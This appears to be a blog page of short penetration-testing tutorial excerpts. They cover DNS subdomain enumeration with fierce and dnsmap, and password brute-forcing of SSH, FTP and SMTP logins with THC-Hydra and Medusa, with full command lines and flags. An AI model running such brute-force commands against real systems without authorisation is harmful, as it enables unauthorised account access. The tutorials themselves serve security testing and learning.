Skillset The brute-force attack is still one of the most popular password cracking methods. Nevertheless, it is not just for password cracking. Brute-force attacks can also be used to discover hidden pages and content in a web application. This attack is basically “a hit and try” until you succeed. This attack sometimes takes longer, but…Read more Popular Tools for Brute-force Attack
> Open your Backtrack or kali linux > Open terminal > Change directory cd /pentest/enumeration/dns/fierce > Run fierce ./fierce.pl -dns mydomain.com
> Open your BackTrack 5 or Kali linux > Change directory: cd /pentest/enumeration/dns/dnsmap/ Usage ./dnsmap [target_domain] [options] Options -w wordlist-file -r regular-results-file -c csv-results-file -d delay-millisecs -i ips-to-ignore Examples dnsmap mydomain.com dnsmap mydomain. -w my_subdomain_wordlist.txt -r /root/myresults/results.txt dnsmap mydomain. -r /root/myresults/ -d 3000 dnsmap mydomain. -c /root/myresults/results.csv
We are going to use hydra to crack ssh. 1. Check if ssh port is open (default 22) nmap -sT -Pn -n -p22 192.168.1.5 2. Try to connect ssh 192.168.1.5 3. Cracking hydra -l root -P mypasslist.lst 192.168.1.5 ssh 4. If step 3 ended succesfully, try to connect again.
THC-Hydra – A very fast network logon cracker which support many different services. See feature sets and services coverage page – incl. a speed comparison against ncrack and medusa. Simple Mail Transfer Protocol (SMTP) is an Internet standard for electronic mail (e-mail) transmission across Internet Protocol (IP) networks. SMTP was first defined by RFC 821…Read more Brute Forcing smtp with Hydra
Hydra – is a very fast network logon cracker which support many different services. FTP: hydra -l root -P passwordslist.txt -e ns -f -t 2 -vV x.x.x.x ftp -l root try login with root username -P passwordslist.txt load passwords from file passwordslist.txt -e ns try null password and try also login as pass (root) -f…Read more Crack FTP passwords – Bruteforcing
Assuming you have Medusa installed (it comes preinstalled with Backtrack and other security distros) and you have a dictionary file use the following syntax: Code: medusa -h <host> -u <target-account> -P <password-file> -M ssh -e n -O output Then simply open 'output' and look to to see if it managed. -e n means medusa will…Read more Bruteforcing SSH with Medusa tutorial